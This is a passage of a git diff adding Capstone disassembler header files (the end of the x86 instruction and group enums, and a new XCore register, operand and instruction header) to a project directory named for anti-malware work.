X86_INS_VFMSUBADDPD, + X86_INS_VFMSUBADD213PD, + X86_INS_VFMSUBADD231PD, + X86_INS_VFMSUBADDPS, + X86_INS_VFMSUBADD213PS, + X86_INS_VFMSUBADD231PS, + X86_INS_VFMSUBPD, + X86_INS_VFMSUB213PD, + X86_INS_VFMSUB231PD, + X86_INS_VFMSUBPS, + 
X86_INS_VFMSUB213PS, + X86_INS_VFMSUB231PS, + X86_INS_VFMSUBSD, + X86_INS_VFMSUB213SD, + X86_INS_VFMSUB132SD, + X86_INS_VFMSUB231SD, + X86_INS_VFMSUBSS, + X86_INS_VFMSUB213SS, + X86_INS_VFMSUB132SS, + X86_INS_VFMSUB231SS, + X86_INS_VFNMADD132PD, + X86_INS_VFNMADD132PS, + X86_INS_VFNMADDPD, + X86_INS_VFNMADD213PD, + X86_INS_VFNMADD231PD, + X86_INS_VFNMADDPS, + X86_INS_VFNMADD213PS, + X86_INS_VFNMADD231PS, + X86_INS_VFNMADDSD, + X86_INS_VFNMADD213SD, + X86_INS_VFNMADD132SD, + X86_INS_VFNMADD231SD, + X86_INS_VFNMADDSS, + X86_INS_VFNMADD213SS, + X86_INS_VFNMADD132SS, + X86_INS_VFNMADD231SS, + X86_INS_VFNMSUB132PD, + X86_INS_VFNMSUB132PS, + X86_INS_VFNMSUBPD, + X86_INS_VFNMSUB213PD, + X86_INS_VFNMSUB231PD, + X86_INS_VFNMSUBPS, + X86_INS_VFNMSUB213PS, + X86_INS_VFNMSUB231PS, + X86_INS_VFNMSUBSD, + X86_INS_VFNMSUB213SD, + X86_INS_VFNMSUB132SD, + X86_INS_VFNMSUB231SD, + X86_INS_VFNMSUBSS, + X86_INS_VFNMSUB213SS, + X86_INS_VFNMSUB132SS, + X86_INS_VFNMSUB231SS, + X86_INS_VFRCZPD, + X86_INS_VFRCZPS, + X86_INS_VFRCZSD, + X86_INS_VFRCZSS, + X86_INS_VORPD, + X86_INS_VORPS, + X86_INS_VXORPD, + X86_INS_VXORPS, + X86_INS_VGATHERDPD, + X86_INS_VGATHERDPS, + X86_INS_VGATHERPF0DPD, + X86_INS_VGATHERPF0DPS, + X86_INS_VGATHERPF0QPD, + X86_INS_VGATHERPF0QPS, + X86_INS_VGATHERPF1DPD, + X86_INS_VGATHERPF1DPS, + X86_INS_VGATHERPF1QPD, + X86_INS_VGATHERPF1QPS, + X86_INS_VGATHERQPD, + X86_INS_VGATHERQPS, + X86_INS_VHADDPD, + X86_INS_VHADDPS, + X86_INS_VHSUBPD, + X86_INS_VHSUBPS, + X86_INS_VINSERTF128, + X86_INS_VINSERTF32X4, + X86_INS_VINSERTF32X8, + X86_INS_VINSERTF64X2, + X86_INS_VINSERTF64X4, + X86_INS_VINSERTI128, + X86_INS_VINSERTI32X4, + X86_INS_VINSERTI32X8, + X86_INS_VINSERTI64X2, + X86_INS_VINSERTI64X4, + X86_INS_VINSERTPS, + X86_INS_VLDDQU, + X86_INS_VLDMXCSR, + X86_INS_VMASKMOVDQU, + X86_INS_VMASKMOVPD, + X86_INS_VMASKMOVPS, + X86_INS_VMAXPD, + X86_INS_VMAXPS, + X86_INS_VMAXSD, + X86_INS_VMAXSS, + X86_INS_VMCALL, + X86_INS_VMCLEAR, + X86_INS_VMFUNC, + X86_INS_VMINPD, + 
X86_INS_VMINPS, + X86_INS_VMINSD, + X86_INS_VMINSS, + X86_INS_VMLAUNCH, + X86_INS_VMLOAD, + X86_INS_VMMCALL, + X86_INS_VMOVQ, + X86_INS_VMOVDDUP, + X86_INS_VMOVD, + X86_INS_VMOVDQA32, + X86_INS_VMOVDQA64, + X86_INS_VMOVDQA, + X86_INS_VMOVDQU16, + X86_INS_VMOVDQU32, + X86_INS_VMOVDQU64, + X86_INS_VMOVDQU8, + X86_INS_VMOVDQU, + X86_INS_VMOVHLPS, + X86_INS_VMOVHPD, + X86_INS_VMOVHPS, + X86_INS_VMOVLHPS, + X86_INS_VMOVLPD, + X86_INS_VMOVLPS, + X86_INS_VMOVMSKPD, + X86_INS_VMOVMSKPS, + X86_INS_VMOVNTDQA, + X86_INS_VMOVNTDQ, + X86_INS_VMOVNTPD, + X86_INS_VMOVNTPS, + X86_INS_VMOVSD, + X86_INS_VMOVSHDUP, + X86_INS_VMOVSLDUP, + X86_INS_VMOVSS, + X86_INS_VMOVUPD, + X86_INS_VMOVUPS, + X86_INS_VMPSADBW, + X86_INS_VMPTRLD, + X86_INS_VMPTRST, + X86_INS_VMREAD, + X86_INS_VMRESUME, + X86_INS_VMRUN, + X86_INS_VMSAVE, + X86_INS_VMULPD, + X86_INS_VMULPS, + X86_INS_VMULSD, + X86_INS_VMULSS, + X86_INS_VMWRITE, + X86_INS_VMXOFF, + X86_INS_VMXON, + X86_INS_VPABSB, + X86_INS_VPABSD, + X86_INS_VPABSQ, + X86_INS_VPABSW, + X86_INS_VPACKSSDW, + X86_INS_VPACKSSWB, + X86_INS_VPACKUSDW, + X86_INS_VPACKUSWB, + X86_INS_VPADDB, + X86_INS_VPADDD, + X86_INS_VPADDQ, + X86_INS_VPADDSB, + X86_INS_VPADDSW, + X86_INS_VPADDUSB, + X86_INS_VPADDUSW, + X86_INS_VPADDW, + X86_INS_VPALIGNR, + X86_INS_VPANDD, + X86_INS_VPANDND, + X86_INS_VPANDNQ, + X86_INS_VPANDN, + X86_INS_VPANDQ, + X86_INS_VPAND, + X86_INS_VPAVGB, + X86_INS_VPAVGW, + X86_INS_VPBLENDD, + X86_INS_VPBLENDMB, + X86_INS_VPBLENDMD, + X86_INS_VPBLENDMQ, + X86_INS_VPBLENDMW, + X86_INS_VPBLENDVB, + X86_INS_VPBLENDW, + X86_INS_VPBROADCASTB, + X86_INS_VPBROADCASTD, + X86_INS_VPBROADCASTMB2Q, + X86_INS_VPBROADCASTMW2D, + X86_INS_VPBROADCASTQ, + X86_INS_VPBROADCASTW, + X86_INS_VPCLMULQDQ, + X86_INS_VPCMOV, + X86_INS_VPCMPB, + X86_INS_VPCMPD, + X86_INS_VPCMPEQB, + X86_INS_VPCMPEQD, + X86_INS_VPCMPEQQ, + X86_INS_VPCMPEQW, + X86_INS_VPCMPESTRI, + X86_INS_VPCMPESTRM, + X86_INS_VPCMPGTB, + X86_INS_VPCMPGTD, + X86_INS_VPCMPGTQ, + X86_INS_VPCMPGTW, + 
X86_INS_VPCMPISTRI, + X86_INS_VPCMPISTRM, + X86_INS_VPCMPQ, + X86_INS_VPCMPUB, + X86_INS_VPCMPUD, + X86_INS_VPCMPUQ, + X86_INS_VPCMPUW, + X86_INS_VPCMPW, + X86_INS_VPCOMB, + X86_INS_VPCOMD, + X86_INS_VPCOMPRESSD, + X86_INS_VPCOMPRESSQ, + X86_INS_VPCOMQ, + X86_INS_VPCOMUB, + X86_INS_VPCOMUD, + X86_INS_VPCOMUQ, + X86_INS_VPCOMUW, + X86_INS_VPCOMW, + X86_INS_VPCONFLICTD, + X86_INS_VPCONFLICTQ, + X86_INS_VPERM2F128, + X86_INS_VPERM2I128, + X86_INS_VPERMD, + X86_INS_VPERMI2D, + X86_INS_VPERMI2PD, + X86_INS_VPERMI2PS, + X86_INS_VPERMI2Q, + X86_INS_VPERMIL2PD, + X86_INS_VPERMIL2PS, + X86_INS_VPERMILPD, + X86_INS_VPERMILPS, + X86_INS_VPERMPD, + X86_INS_VPERMPS, + X86_INS_VPERMQ, + X86_INS_VPERMT2D, + X86_INS_VPERMT2PD, + X86_INS_VPERMT2PS, + X86_INS_VPERMT2Q, + X86_INS_VPEXPANDD, + X86_INS_VPEXPANDQ, + X86_INS_VPEXTRB, + X86_INS_VPEXTRD, + X86_INS_VPEXTRQ, + X86_INS_VPEXTRW, + X86_INS_VPGATHERDD, + X86_INS_VPGATHERDQ, + X86_INS_VPGATHERQD, + X86_INS_VPGATHERQQ, + X86_INS_VPHADDBD, + X86_INS_VPHADDBQ, + X86_INS_VPHADDBW, + X86_INS_VPHADDDQ, + X86_INS_VPHADDD, + X86_INS_VPHADDSW, + X86_INS_VPHADDUBD, + X86_INS_VPHADDUBQ, + X86_INS_VPHADDUBW, + X86_INS_VPHADDUDQ, + X86_INS_VPHADDUWD, + X86_INS_VPHADDUWQ, + X86_INS_VPHADDWD, + X86_INS_VPHADDWQ, + X86_INS_VPHADDW, + X86_INS_VPHMINPOSUW, + X86_INS_VPHSUBBW, + X86_INS_VPHSUBDQ, + X86_INS_VPHSUBD, + X86_INS_VPHSUBSW, + X86_INS_VPHSUBWD, + X86_INS_VPHSUBW, + X86_INS_VPINSRB, + X86_INS_VPINSRD, + X86_INS_VPINSRQ, + X86_INS_VPINSRW, + X86_INS_VPLZCNTD, + X86_INS_VPLZCNTQ, + X86_INS_VPMACSDD, + X86_INS_VPMACSDQH, + X86_INS_VPMACSDQL, + X86_INS_VPMACSSDD, + X86_INS_VPMACSSDQH, + X86_INS_VPMACSSDQL, + X86_INS_VPMACSSWD, + X86_INS_VPMACSSWW, + X86_INS_VPMACSWD, + X86_INS_VPMACSWW, + X86_INS_VPMADCSSWD, + X86_INS_VPMADCSWD, + X86_INS_VPMADDUBSW, + X86_INS_VPMADDWD, + X86_INS_VPMASKMOVD, + X86_INS_VPMASKMOVQ, + X86_INS_VPMAXSB, + X86_INS_VPMAXSD, + X86_INS_VPMAXSQ, + X86_INS_VPMAXSW, + X86_INS_VPMAXUB, + X86_INS_VPMAXUD, + X86_INS_VPMAXUQ, 
+ X86_INS_VPMAXUW, + X86_INS_VPMINSB, + X86_INS_VPMINSD, + X86_INS_VPMINSQ, + X86_INS_VPMINSW, + X86_INS_VPMINUB, + X86_INS_VPMINUD, + X86_INS_VPMINUQ, + X86_INS_VPMINUW, + X86_INS_VPMOVDB, + X86_INS_VPMOVDW, + X86_INS_VPMOVM2B, + X86_INS_VPMOVM2D, + X86_INS_VPMOVM2Q, + X86_INS_VPMOVM2W, + X86_INS_VPMOVMSKB, + X86_INS_VPMOVQB, + X86_INS_VPMOVQD, + X86_INS_VPMOVQW, + X86_INS_VPMOVSDB, + X86_INS_VPMOVSDW, + X86_INS_VPMOVSQB, + X86_INS_VPMOVSQD, + X86_INS_VPMOVSQW, + X86_INS_VPMOVSXBD, + X86_INS_VPMOVSXBQ, + X86_INS_VPMOVSXBW, + X86_INS_VPMOVSXDQ, + X86_INS_VPMOVSXWD, + X86_INS_VPMOVSXWQ, + X86_INS_VPMOVUSDB, + X86_INS_VPMOVUSDW, + X86_INS_VPMOVUSQB, + X86_INS_VPMOVUSQD, + X86_INS_VPMOVUSQW, + X86_INS_VPMOVZXBD, + X86_INS_VPMOVZXBQ, + X86_INS_VPMOVZXBW, + X86_INS_VPMOVZXDQ, + X86_INS_VPMOVZXWD, + X86_INS_VPMOVZXWQ, + X86_INS_VPMULDQ, + X86_INS_VPMULHRSW, + X86_INS_VPMULHUW, + X86_INS_VPMULHW, + X86_INS_VPMULLD, + X86_INS_VPMULLQ, + X86_INS_VPMULLW, + X86_INS_VPMULUDQ, + X86_INS_VPORD, + X86_INS_VPORQ, + X86_INS_VPOR, + X86_INS_VPPERM, + X86_INS_VPROTB, + X86_INS_VPROTD, + X86_INS_VPROTQ, + X86_INS_VPROTW, + X86_INS_VPSADBW, + X86_INS_VPSCATTERDD, + X86_INS_VPSCATTERDQ, + X86_INS_VPSCATTERQD, + X86_INS_VPSCATTERQQ, + X86_INS_VPSHAB, + X86_INS_VPSHAD, + X86_INS_VPSHAQ, + X86_INS_VPSHAW, + X86_INS_VPSHLB, + X86_INS_VPSHLD, + X86_INS_VPSHLQ, + X86_INS_VPSHLW, + X86_INS_VPSHUFB, + X86_INS_VPSHUFD, + X86_INS_VPSHUFHW, + X86_INS_VPSHUFLW, + X86_INS_VPSIGNB, + X86_INS_VPSIGND, + X86_INS_VPSIGNW, + X86_INS_VPSLLDQ, + X86_INS_VPSLLD, + X86_INS_VPSLLQ, + X86_INS_VPSLLVD, + X86_INS_VPSLLVQ, + X86_INS_VPSLLW, + X86_INS_VPSRAD, + X86_INS_VPSRAQ, + X86_INS_VPSRAVD, + X86_INS_VPSRAVQ, + X86_INS_VPSRAW, + X86_INS_VPSRLDQ, + X86_INS_VPSRLD, + X86_INS_VPSRLQ, + X86_INS_VPSRLVD, + X86_INS_VPSRLVQ, + X86_INS_VPSRLW, + X86_INS_VPSUBB, + X86_INS_VPSUBD, + X86_INS_VPSUBQ, + X86_INS_VPSUBSB, + X86_INS_VPSUBSW, + X86_INS_VPSUBUSB, + X86_INS_VPSUBUSW, + X86_INS_VPSUBW, + X86_INS_VPTESTMD, + 
X86_INS_VPTESTMQ, + X86_INS_VPTESTNMD, + X86_INS_VPTESTNMQ, + X86_INS_VPTEST, + X86_INS_VPUNPCKHBW, + X86_INS_VPUNPCKHDQ, + X86_INS_VPUNPCKHQDQ, + X86_INS_VPUNPCKHWD, + X86_INS_VPUNPCKLBW, + X86_INS_VPUNPCKLDQ, + X86_INS_VPUNPCKLQDQ, + X86_INS_VPUNPCKLWD, + X86_INS_VPXORD, + X86_INS_VPXORQ, + X86_INS_VPXOR, + X86_INS_VRCP14PD, + X86_INS_VRCP14PS, + X86_INS_VRCP14SD, + X86_INS_VRCP14SS, + X86_INS_VRCP28PD, + X86_INS_VRCP28PS, + X86_INS_VRCP28SD, + X86_INS_VRCP28SS, + X86_INS_VRCPPS, + X86_INS_VRCPSS, + X86_INS_VRNDSCALEPD, + X86_INS_VRNDSCALEPS, + X86_INS_VRNDSCALESD, + X86_INS_VRNDSCALESS, + X86_INS_VROUNDPD, + X86_INS_VROUNDPS, + X86_INS_VROUNDSD, + X86_INS_VROUNDSS, + X86_INS_VRSQRT14PD, + X86_INS_VRSQRT14PS, + X86_INS_VRSQRT14SD, + X86_INS_VRSQRT14SS, + X86_INS_VRSQRT28PD, + X86_INS_VRSQRT28PS, + X86_INS_VRSQRT28SD, + X86_INS_VRSQRT28SS, + X86_INS_VRSQRTPS, + X86_INS_VRSQRTSS, + X86_INS_VSCATTERDPD, + X86_INS_VSCATTERDPS, + X86_INS_VSCATTERPF0DPD, + X86_INS_VSCATTERPF0DPS, + X86_INS_VSCATTERPF0QPD, + X86_INS_VSCATTERPF0QPS, + X86_INS_VSCATTERPF1DPD, + X86_INS_VSCATTERPF1DPS, + X86_INS_VSCATTERPF1QPD, + X86_INS_VSCATTERPF1QPS, + X86_INS_VSCATTERQPD, + X86_INS_VSCATTERQPS, + X86_INS_VSHUFPD, + X86_INS_VSHUFPS, + X86_INS_VSQRTPD, + X86_INS_VSQRTPS, + X86_INS_VSQRTSD, + X86_INS_VSQRTSS, + X86_INS_VSTMXCSR, + X86_INS_VSUBPD, + X86_INS_VSUBPS, + X86_INS_VSUBSD, + X86_INS_VSUBSS, + X86_INS_VTESTPD, + X86_INS_VTESTPS, + X86_INS_VUNPCKHPD, + X86_INS_VUNPCKHPS, + X86_INS_VUNPCKLPD, + X86_INS_VUNPCKLPS, + X86_INS_VZEROALL, + X86_INS_VZEROUPPER, + X86_INS_WAIT, + X86_INS_WBINVD, + X86_INS_WRFSBASE, + X86_INS_WRGSBASE, + X86_INS_WRMSR, + X86_INS_XABORT, + X86_INS_XACQUIRE, + X86_INS_XBEGIN, + X86_INS_XCHG, + X86_INS_XCRYPTCBC, + X86_INS_XCRYPTCFB, + X86_INS_XCRYPTCTR, + X86_INS_XCRYPTECB, + X86_INS_XCRYPTOFB, + X86_INS_XEND, + X86_INS_XGETBV, + X86_INS_XLATB, + X86_INS_XRELEASE, + X86_INS_XRSTOR, + X86_INS_XRSTOR64, + X86_INS_XRSTORS, + X86_INS_XRSTORS64, + X86_INS_XSAVE, + 
X86_INS_XSAVE64, + X86_INS_XSAVEC, + X86_INS_XSAVEC64, + X86_INS_XSAVEOPT, + X86_INS_XSAVEOPT64, + X86_INS_XSAVES, + X86_INS_XSAVES64, + X86_INS_XSETBV, + X86_INS_XSHA1, + X86_INS_XSHA256, + X86_INS_XSTORE, + X86_INS_XTEST, + X86_INS_FDISI8087_NOP, + X86_INS_FENI8087_NOP, + + // pseudo instructions + X86_INS_CMPSS, + X86_INS_CMPEQSS, + X86_INS_CMPLTSS, + X86_INS_CMPLESS, + X86_INS_CMPUNORDSS, + X86_INS_CMPNEQSS, + X86_INS_CMPNLTSS, + X86_INS_CMPNLESS, + X86_INS_CMPORDSS, + + X86_INS_CMPSD, + X86_INS_CMPEQSD, + X86_INS_CMPLTSD, + X86_INS_CMPLESD, + X86_INS_CMPUNORDSD, + X86_INS_CMPNEQSD, + X86_INS_CMPNLTSD, + X86_INS_CMPNLESD, + X86_INS_CMPORDSD, + + X86_INS_CMPPS, + X86_INS_CMPEQPS, + X86_INS_CMPLTPS, + X86_INS_CMPLEPS, + X86_INS_CMPUNORDPS, + X86_INS_CMPNEQPS, + X86_INS_CMPNLTPS, + X86_INS_CMPNLEPS, + X86_INS_CMPORDPS, + + X86_INS_CMPPD, + X86_INS_CMPEQPD, + X86_INS_CMPLTPD, + X86_INS_CMPLEPD, + X86_INS_CMPUNORDPD, + X86_INS_CMPNEQPD, + X86_INS_CMPNLTPD, + X86_INS_CMPNLEPD, + X86_INS_CMPORDPD, + + X86_INS_VCMPSS, + X86_INS_VCMPEQSS, + X86_INS_VCMPLTSS, + X86_INS_VCMPLESS, + X86_INS_VCMPUNORDSS, + X86_INS_VCMPNEQSS, + X86_INS_VCMPNLTSS, + X86_INS_VCMPNLESS, + X86_INS_VCMPORDSS, + X86_INS_VCMPEQ_UQSS, + X86_INS_VCMPNGESS, + X86_INS_VCMPNGTSS, + X86_INS_VCMPFALSESS, + X86_INS_VCMPNEQ_OQSS, + X86_INS_VCMPGESS, + X86_INS_VCMPGTSS, + X86_INS_VCMPTRUESS, + X86_INS_VCMPEQ_OSSS, + X86_INS_VCMPLT_OQSS, + X86_INS_VCMPLE_OQSS, + X86_INS_VCMPUNORD_SSS, + X86_INS_VCMPNEQ_USSS, + X86_INS_VCMPNLT_UQSS, + X86_INS_VCMPNLE_UQSS, + X86_INS_VCMPORD_SSS, + X86_INS_VCMPEQ_USSS, + X86_INS_VCMPNGE_UQSS, + X86_INS_VCMPNGT_UQSS, + X86_INS_VCMPFALSE_OSSS, + X86_INS_VCMPNEQ_OSSS, + X86_INS_VCMPGE_OQSS, + X86_INS_VCMPGT_OQSS, + X86_INS_VCMPTRUE_USSS, + + X86_INS_VCMPSD, + X86_INS_VCMPEQSD, + X86_INS_VCMPLTSD, + X86_INS_VCMPLESD, + X86_INS_VCMPUNORDSD, + X86_INS_VCMPNEQSD, + X86_INS_VCMPNLTSD, + X86_INS_VCMPNLESD, + X86_INS_VCMPORDSD, + X86_INS_VCMPEQ_UQSD, + X86_INS_VCMPNGESD, + 
X86_INS_VCMPNGTSD, + X86_INS_VCMPFALSESD, + X86_INS_VCMPNEQ_OQSD, + X86_INS_VCMPGESD, + X86_INS_VCMPGTSD, + X86_INS_VCMPTRUESD, + X86_INS_VCMPEQ_OSSD, + X86_INS_VCMPLT_OQSD, + X86_INS_VCMPLE_OQSD, + X86_INS_VCMPUNORD_SSD, + X86_INS_VCMPNEQ_USSD, + X86_INS_VCMPNLT_UQSD, + X86_INS_VCMPNLE_UQSD, + X86_INS_VCMPORD_SSD, + X86_INS_VCMPEQ_USSD, + X86_INS_VCMPNGE_UQSD, + X86_INS_VCMPNGT_UQSD, + X86_INS_VCMPFALSE_OSSD, + X86_INS_VCMPNEQ_OSSD, + X86_INS_VCMPGE_OQSD, + X86_INS_VCMPGT_OQSD, + X86_INS_VCMPTRUE_USSD, + + X86_INS_VCMPPS, + X86_INS_VCMPEQPS, + X86_INS_VCMPLTPS, + X86_INS_VCMPLEPS, + X86_INS_VCMPUNORDPS, + X86_INS_VCMPNEQPS, + X86_INS_VCMPNLTPS, + X86_INS_VCMPNLEPS, + X86_INS_VCMPORDPS, + X86_INS_VCMPEQ_UQPS, + X86_INS_VCMPNGEPS, + X86_INS_VCMPNGTPS, + X86_INS_VCMPFALSEPS, + X86_INS_VCMPNEQ_OQPS, + X86_INS_VCMPGEPS, + X86_INS_VCMPGTPS, + X86_INS_VCMPTRUEPS, + X86_INS_VCMPEQ_OSPS, + X86_INS_VCMPLT_OQPS, + X86_INS_VCMPLE_OQPS, + X86_INS_VCMPUNORD_SPS, + X86_INS_VCMPNEQ_USPS, + X86_INS_VCMPNLT_UQPS, + X86_INS_VCMPNLE_UQPS, + X86_INS_VCMPORD_SPS, + X86_INS_VCMPEQ_USPS, + X86_INS_VCMPNGE_UQPS, + X86_INS_VCMPNGT_UQPS, + X86_INS_VCMPFALSE_OSPS, + X86_INS_VCMPNEQ_OSPS, + X86_INS_VCMPGE_OQPS, + X86_INS_VCMPGT_OQPS, + X86_INS_VCMPTRUE_USPS, + + X86_INS_VCMPPD, + X86_INS_VCMPEQPD, + X86_INS_VCMPLTPD, + X86_INS_VCMPLEPD, + X86_INS_VCMPUNORDPD, + X86_INS_VCMPNEQPD, + X86_INS_VCMPNLTPD, + X86_INS_VCMPNLEPD, + X86_INS_VCMPORDPD, + X86_INS_VCMPEQ_UQPD, + X86_INS_VCMPNGEPD, + X86_INS_VCMPNGTPD, + X86_INS_VCMPFALSEPD, + X86_INS_VCMPNEQ_OQPD, + X86_INS_VCMPGEPD, + X86_INS_VCMPGTPD, + X86_INS_VCMPTRUEPD, + X86_INS_VCMPEQ_OSPD, + X86_INS_VCMPLT_OQPD, + X86_INS_VCMPLE_OQPD, + X86_INS_VCMPUNORD_SPD, + X86_INS_VCMPNEQ_USPD, + X86_INS_VCMPNLT_UQPD, + X86_INS_VCMPNLE_UQPD, + X86_INS_VCMPORD_SPD, + X86_INS_VCMPEQ_USPD, + X86_INS_VCMPNGE_UQPD, + X86_INS_VCMPNGT_UQPD, + X86_INS_VCMPFALSE_OSPD, + X86_INS_VCMPNEQ_OSPD, + X86_INS_VCMPGE_OQPD, + X86_INS_VCMPGT_OQPD, + X86_INS_VCMPTRUE_USPD, + + 
X86_INS_UD0, + X86_INS_ENDBR32, + X86_INS_ENDBR64, + + X86_INS_ENDING, // mark the end of the list of insn +} x86_insn; + +/// Group of X86 instructions +typedef enum x86_insn_group { + X86_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + // Generic groups + // all jump instructions (conditional+direct+indirect jumps) + X86_GRP_JUMP, ///< = CS_GRP_JUMP + // all call instructions + X86_GRP_CALL, ///< = CS_GRP_CALL + // all return instructions + X86_GRP_RET, ///< = CS_GRP_RET + // all interrupt instructions (int+syscall) + X86_GRP_INT, ///< = CS_GRP_INT + // all interrupt return instructions + X86_GRP_IRET, ///< = CS_GRP_IRET + // all privileged instructions + X86_GRP_PRIVILEGE, ///< = CS_GRP_PRIVILEGE + // all relative branching instructions + X86_GRP_BRANCH_RELATIVE, ///< = CS_GRP_BRANCH_RELATIVE + + // Architecture-specific groups + X86_GRP_VM = 128, ///< all virtualization instructions (VT-x + AMD-V) + X86_GRP_3DNOW, + X86_GRP_AES, + X86_GRP_ADX, + X86_GRP_AVX, + X86_GRP_AVX2, + X86_GRP_AVX512, + X86_GRP_BMI, + X86_GRP_BMI2, + X86_GRP_CMOV, + X86_GRP_F16C, + X86_GRP_FMA, + X86_GRP_FMA4, + X86_GRP_FSGSBASE, + X86_GRP_HLE, + X86_GRP_MMX, + X86_GRP_MODE32, + X86_GRP_MODE64, + X86_GRP_RTM, + X86_GRP_SHA, + X86_GRP_SSE1, + X86_GRP_SSE2, + X86_GRP_SSE3, + X86_GRP_SSE41, + X86_GRP_SSE42, + X86_GRP_SSE4A, + X86_GRP_SSSE3, + X86_GRP_PCLMUL, + X86_GRP_XOP, + X86_GRP_CDI, + X86_GRP_ERI, + X86_GRP_TBM, + X86_GRP_16BITMODE, + X86_GRP_NOT64BITMODE, + X86_GRP_SGX, + X86_GRP_DQI, + X86_GRP_BWI, + X86_GRP_PFI, + X86_GRP_VLX, + X86_GRP_SMAP, + X86_GRP_NOVLX, + X86_GRP_FPU, + + X86_GRP_ENDING +} x86_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/xcore.h b/ai_anti_malware/capstone/include/capstone/xcore.h new file mode 100644 index 0000000..6db1f24 --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/xcore.h @@ -0,0 +1,235 @@ +#ifndef CAPSTONE_XCORE_H +#define CAPSTONE_XCORE_H + +/* Capstone Disassembly Engine */ +/* 
By Nguyen Anh Quynh , 2014-2015 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +/// Operand type for instruction's operands +typedef enum xcore_op_type { + XCORE_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + XCORE_OP_REG, ///< = CS_OP_REG (Register operand). + XCORE_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + XCORE_OP_MEM, ///< = CS_OP_MEM (Memory operand). +} xcore_op_type; + +/// XCore registers +typedef enum xcore_reg { + XCORE_REG_INVALID = 0, + + XCORE_REG_CP, + XCORE_REG_DP, + XCORE_REG_LR, + XCORE_REG_SP, + XCORE_REG_R0, + XCORE_REG_R1, + XCORE_REG_R2, + XCORE_REG_R3, + XCORE_REG_R4, + XCORE_REG_R5, + XCORE_REG_R6, + XCORE_REG_R7, + XCORE_REG_R8, + XCORE_REG_R9, + XCORE_REG_R10, + XCORE_REG_R11, + + // pseudo registers + XCORE_REG_PC, ///< pc + + // internal thread registers + // see The-XMOS-XS1-Architecture(X7879A).pdf + XCORE_REG_SCP, ///< save pc + XCORE_REG_SSR, //< save status + XCORE_REG_ET, //< exception type + XCORE_REG_ED, //< exception data + XCORE_REG_SED, //< save exception data + XCORE_REG_KEP, //< kernel entry pointer + XCORE_REG_KSP, //< kernel stack pointer + XCORE_REG_ID, //< thread ID + + XCORE_REG_ENDING, // <-- mark the end of the list of registers +} xcore_reg; + +/// Instruction's operand referring to memory +/// This is associated with XCORE_OP_MEM operand type above +typedef struct xcore_op_mem { + uint8_t base; ///< base register, can be safely interpreted as + ///< a value of type `xcore_reg`, but it is only + ///< one byte wide + uint8_t index; ///< index register, same conditions apply here + int32_t disp; ///< displacement/offset value + int direct; ///< +1: forward, -1: backward +} xcore_op_mem; + +/// Instruction operand +typedef struct cs_xcore_op { + xcore_op_type type; ///< operand type + union { + xcore_reg reg; ///< register value for REG operand + int32_t imm; ///< immediate value for IMM operand + xcore_op_mem mem; ///< 
base/disp value for MEM operand + }; +} cs_xcore_op; + +/// Instruction structure +typedef struct cs_xcore { + /// Number of operands of this instruction, + /// or 0 when instruction has no operand. + uint8_t op_count; + cs_xcore_op operands[8]; ///< operands for this instruction. +} cs_xcore; + +/// XCore instruction +typedef enum xcore_insn { + XCORE_INS_INVALID = 0, + + XCORE_INS_ADD, + XCORE_INS_ANDNOT, + XCORE_INS_AND, + XCORE_INS_ASHR, + XCORE_INS_BAU, + XCORE_INS_BITREV, + XCORE_INS_BLA, + XCORE_INS_BLAT, + XCORE_INS_BL, + XCORE_INS_BF, + XCORE_INS_BT, + XCORE_INS_BU, + XCORE_INS_BRU, + XCORE_INS_BYTEREV, + XCORE_INS_CHKCT, + XCORE_INS_CLRE, + XCORE_INS_CLRPT, + XCORE_INS_CLRSR, + XCORE_INS_CLZ, + XCORE_INS_CRC8, + XCORE_INS_CRC32, + XCORE_INS_DCALL, + XCORE_INS_DENTSP, + XCORE_INS_DGETREG, + XCORE_INS_DIVS, + XCORE_INS_DIVU, + XCORE_INS_DRESTSP, + XCORE_INS_DRET, + XCORE_INS_ECALLF, + XCORE_INS_ECALLT, + XCORE_INS_EDU, + XCORE_INS_EEF, + XCORE_INS_EET, + XCORE_INS_EEU, + XCORE_INS_ENDIN, + XCORE_INS_ENTSP, + XCORE_INS_EQ, + XCORE_INS_EXTDP, + XCORE_INS_EXTSP, + XCORE_INS_FREER, + XCORE_INS_FREET, + XCORE_INS_GETD, + XCORE_INS_GET, + XCORE_INS_GETN, + XCORE_INS_GETR, + XCORE_INS_GETSR, + XCORE_INS_GETST, + XCORE_INS_GETTS, + XCORE_INS_INCT, + XCORE_INS_INIT, + XCORE_INS_INPW, + XCORE_INS_INSHR, + XCORE_INS_INT, + XCORE_INS_IN, + XCORE_INS_KCALL, + XCORE_INS_KENTSP, + XCORE_INS_KRESTSP, + XCORE_INS_KRET, + XCORE_INS_LADD, + XCORE_INS_LD16S, + XCORE_INS_LD8U, + XCORE_INS_LDA16, + XCORE_INS_LDAP, + XCORE_INS_LDAW, + XCORE_INS_LDC, + XCORE_INS_LDW, + XCORE_INS_LDIVU, + XCORE_INS_LMUL, + XCORE_INS_LSS, + XCORE_INS_LSUB, + XCORE_INS_LSU, + XCORE_INS_MACCS, + XCORE_INS_MACCU, + XCORE_INS_MJOIN, + XCORE_INS_MKMSK, + XCORE_INS_MSYNC, + XCORE_INS_MUL, + XCORE_INS_NEG, + XCORE_INS_NOT, + XCORE_INS_OR, + XCORE_INS_OUTCT, + XCORE_INS_OUTPW, + XCORE_INS_OUTSHR, + XCORE_INS_OUTT, + XCORE_INS_OUT, + XCORE_INS_PEEK, + XCORE_INS_REMS, + XCORE_INS_REMU, + XCORE_INS_RETSP, + 
